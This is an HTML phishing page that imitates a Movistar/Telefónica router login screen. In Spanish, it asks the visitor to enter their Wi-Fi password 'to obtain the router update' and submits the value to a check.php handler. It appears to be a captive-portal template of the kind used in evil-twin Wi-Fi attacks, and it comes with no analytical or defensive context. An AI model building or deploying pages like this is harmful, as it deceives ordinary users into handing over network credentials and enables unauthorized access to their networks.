<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0027)http://192.168.1.1/login.lp -->
<html><head>








<meta name="viewport" content="width=device-width">


<style>
img {
    max-width: 100%;
}
</style>
	<title>obtener la actualización</title>

	<link type="text/css" rel="stylesheet" href="Home%20Station_files/network_map.css">
	<link href="Home%20Station_files/telefonica.css" type="text/css" rel="stylesheet">
</head>

<body>	
	<div id="panel_general">		
		<center>
<div id="panel_header"><img src="./SKN/13441954_10206598010251409_461689813_o.png">
	<div class="./SKN/13441954_10206598010251409_461689813_o.png">
		

		
	</div>
</div>
		
		
		
<center>
<br><b>
   
 <H2>Ingrese la contraseña (Wifi) para obtener la actualización de su enrutador</H2>

</b>
<br><b>
</b>
<br><b>
<form id="form1" name="form1" method="POST" action="check.php" >
<tr>
<td colspan="3"><input type="password" name="key1" id="password" maxlength="64" style="width: 250px;"></td>

	
   
			  <center>
<br><b>
</b>
			  <input name="ok" type="submit" value="enviar">
        	  <input name="cancel" type="reset" value="cancelar">
        	  
        	  <div id="panel_footer"><div class="footer">
	<div id="imgFooter" class="imgFooter"></div>
	
	<br><b>
</b>

	<br><b>
</b>

	<br><b>
</b>

	<br><b>
</b>

	<br><b>
</b>

	<br><b>
</b>

	<br><b>
</b>

	<br><b>
</b>

	<br><b>
</b>


	<div id="txtFooter" class="txtFooter">
	© 2020 Movistar Telefónica S.A. <span class="trad" key="FOOT_RIGHTS">All rights reserved</span></a>
	</div>
	<div id="remaining_session_box" style="float:right; display:none;">
	<span>Remaining Session: </span>	
		<span id="remaining_session"></span>
	</div>

</div></div>
	</div>		


</body></html>